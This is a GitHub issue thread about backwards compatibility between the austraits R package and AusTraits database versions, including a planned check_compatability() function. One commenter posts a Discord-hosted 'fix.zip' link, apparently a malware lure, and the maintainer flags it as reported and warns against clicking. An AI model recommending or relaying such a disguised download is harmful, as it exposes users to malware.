### ISSUE TITLE
Backwards compatibility of austraits R package functions and AusTraits versions 

### ISSUE THREAD

**Issue by fontikar** [traitecoevo/austraits#93]
The first step of this migration is to **check the compatibility** of a user's loaded version of austraits via `load_austraits()` 

- [ ] The `check_compatability()` function will look at the meta-data of the `austraits` object and if it is **not** compiled by `traits.build`, 

- [ ] it will `message()` the user that their version of the database is out of date and functions of the `austraits` package will not work. Then point them to documentation in the README for more info. 

- [ ] Simple unit test to for `check_compatability()` would be greatly appreciated - expect_error and expect_true when a test subset of austraits is compatible. 

The README will have a subsection `### Backwards compatibility`, detailing what versions of AusTraits are still current supported by the `austraits` R package and if they must, some R code installing older versions of austraits using commit hashs or [GitHub release tags](https://github.com/traitecoevo/austraits/releases) in the `remotes::install_github()` function.

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by fontikar** [comment]
☝️ ⚠️ 🚨 ☝️ ⚠️ 🚨 ☝️ ⚠️ 🚨 ☝️ ⚠️ 🚨 ☝️ ⚠️ 🚨 ☝️ ⚠️ 🚨  
The link above has reported. DO NOT CLICK
☝️ ⚠️ 🚨 ☝️ ⚠️ 🚨 ☝️ ⚠️ 🚨 ☝️ ⚠️ 🚨 ☝️ ⚠️ 🚨 ☝️ ⚠️ 🚨
